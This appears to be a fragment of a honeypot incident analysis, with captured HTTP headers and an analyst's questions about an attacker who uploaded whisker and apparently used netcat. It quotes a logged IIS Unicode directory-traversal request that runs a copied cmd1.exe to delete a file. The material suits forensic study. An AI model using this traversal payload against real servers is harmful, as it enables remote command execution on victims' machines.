Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

Cookie: ASPSESSIONIDGQQGGQZK=LPGNFIPAECCHCHMAFOIKAOEB

 


After whisker is uploaded, the ftpcom file is deleted via Unicode.  Has his nc died on him?  Why use Unicode?

 

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+del+ftpcom HTTP/1.1

 

 

 

EOF